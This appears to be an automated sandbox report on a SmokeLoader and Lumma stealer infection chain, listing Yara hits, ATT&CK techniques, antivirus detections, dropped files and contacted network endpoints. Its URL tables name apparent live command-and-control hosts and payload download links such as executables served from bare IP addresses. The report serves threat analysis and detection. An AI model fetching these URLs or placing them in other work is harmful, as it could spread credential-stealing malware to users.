                  Source: Yara match; File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match; File source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6CAD0C40 sqlite3_bind_zeroblob,13_2_6CAD0C40
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6CAD0D60 sqlite3_bind_parameter_name,13_2_6CAD0D60
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9F8EA0 sqlite3_clear_bindings,13_2_6C9F8EA0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6CAD0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,13_2_6CAD0B40
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9F6410 bind,WSAGetLastError,13_2_6C9F6410
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9F60B0 listen,WSAGetLastError,13_2_6C9F60B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9FC030 sqlite3_bind_parameter_count,13_2_6C9FC030
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,13_2_6C9FC050
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9F6070 PR_Listen,13_2_6C9F6070
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9822D0 sqlite3_bind_blob,13_2_6C9822D0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp; Code function: 13_2_6C9F63C0 PR_Bind,13_2_6C9F63C0
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 14 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 812 Process Injection | 4 Obfuscated Files or Information | 1 Credentials in Registry | 12 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 22 Software Packing | Security Account Manager | 37 System Information Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Network Share Discovery | Distributed Component Object Model | 2 Clipboard Data | 125 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 551 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 22 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 812 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  [Behavior graph] ID: 1447731; Sample: c3f3d7cea638c32610d85c9c1df...; Startdate: 27/05/2024; Architecture: WINDOWS; Score: 100

                  Source | Detection | Scanner | Label | Link
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | 55% | ReversingLabs | Win32.Trojan.SmokeLoader |
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | 59% | Virustotal | | Browse
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\21AE.exe | 100% | Avira | TR/AVI.AceCrypter.javlp |
                  C:\Users\user\AppData\Roaming\aarhevh | 100% | Avira | TR/Crypt.XPACK.Gen |
                  C:\Users\user\AppData\Local\Temp\C9A7.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\21AE.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Roaming\aarhevh | 100% | Joe Sandbox ML | |
                  C:\ProgramData\GIEHIDHJDBFI\freebl3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\GIEHIDHJDBFI\mozglue.dll | 0% | ReversingLabs | |
                  C:\ProgramData\GIEHIDHJDBFI\msvcp140.dll | 0% | ReversingLabs | |
                  C:\ProgramData\GIEHIDHJDBFI\nss3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\GIEHIDHJDBFI\softokn3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\21AE.exe | 92% | ReversingLabs | Win32.Spyware.Lummastealer |
                  C:\Users\user\AppData\Local\Temp\katA304.tmp | 4% | ReversingLabs | |
                  C:\Users\user\AppData\Roaming\aarhevh | 55% | ReversingLabs | Win32.Trojan.SmokeLoader |

                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  whispedwoodmoodsksl.shop | 17% | Virustotal | | Browse
                  steamcommunity.com | 0% | Virustotal | | Browse
                  dbfhns.in | 5% | Virustotal | | Browse
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  whispedwoodmoodsksl.shop | 188.114.97.3 | true | true | | unknown
                  steamcommunity.com | 104.102.42.29 | true | true | | unknown
                  dbfhns.in | 187.143.58.5 | true | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  https://whispedwoodmoodsksl.shop/api | true | 17%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  http://23.145.40.124/pintxi1lv.exe | true | Avira URL Cloud: safe | unknown
                  https://65.109.242.59/ | false | 7%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  whispedwoodmoodsksl.shop | true | 17%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  http://guteyr.cc/tmp/index.php | true | 16%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  https://65.109.242.59/nss3.dll | false | Avira URL Cloud: safe | unknown
                  http://185.235.137.54/file/host_so.exe | false | 20%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  miniaturefinerninewjs.shop | true | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  https://65.109.242.59/softokn3.dll | false | Avira URL Cloud: safe | unknown
                  obsceneclassyjuwks.shop | true | 18%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  https://65.109.242.59/freebl3.dll | false | Avira URL Cloud: safe | unknown
                  http://45.129.96.86/file/update.exe | true | 20%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  https://steamcommunity.com/profiles/76561199689717899 | true | Avira URL Cloud: safe | unknown
                  http://dbfhns.in/tmp/index.php | true | Avira URL Cloud: safe | unknown
                  http://lobulraualov.in.net/tmp/index.php | true | Avira URL Cloud: safe | unknown
                  https://65.109.242.59/mozglue.dll | false | Avira URL Cloud: safe | unknown
                  https://65.109.242.59/vcruntime140.dll | false | Avira URL Cloud: safe | unknown
                  https://65.109.242.59/sqls.dll | false | Avira URL Cloud: safe | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  • URL Reputation: safe
                  unknown
                  http://www.valvesoftware.com/legal.htmkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.youtube.comkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.comkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59/gkatA304.tmp, 0000000D.00000003.2699380936.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://65.109.242.59/lkatA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 5%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://65.109.242.59/kkatA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2042302155.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://whispedwoodmoodsksl.shop/apie21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://s.ytimg.com;katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://t.me/copterwinC9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://65.109.242.59/rkatA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://steam.tv/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59/mozglue.dllaokatA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.mozilla.com/en-US/blocklist/katA304.tmp, katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://steamcommunity.com/mkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://mozilla.org0/katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://t.me/copterwinr0isMozilla/5.0katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://store.steampowered.com/privacy_agreement/katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59/HkatA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://store.steampowered.com/points/shop/katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jskatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://whispedwoodmoodsksl.shop/X21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.rootca1.amazontrust.com/rootca1.crl021AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59JKFIkatA304.tmp, 0000000D.00000002.3122811283.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.rootca1.amazontrust.com0:21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://sketchfab.comkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.ecosia.org/newtab/21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://lv.queniujq.cnkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://outlook.comexplorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brGIIDBG.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.youtube.com/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://store.steampowered.com/privacy_agreement/katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59akatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59/#katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.clokatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://whispedwoodmoodsksl.shop/21AE.exe, 00000005.00000003.2357257185.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.000000000089C000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000801000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506059857.000000000089B000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2397590103.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://www.google.com/recaptcha/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://checkout.steampowered.com/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLGIIDBG.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refkatA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drfalse
                  • Avira URL Cloud: safe
                  unknown
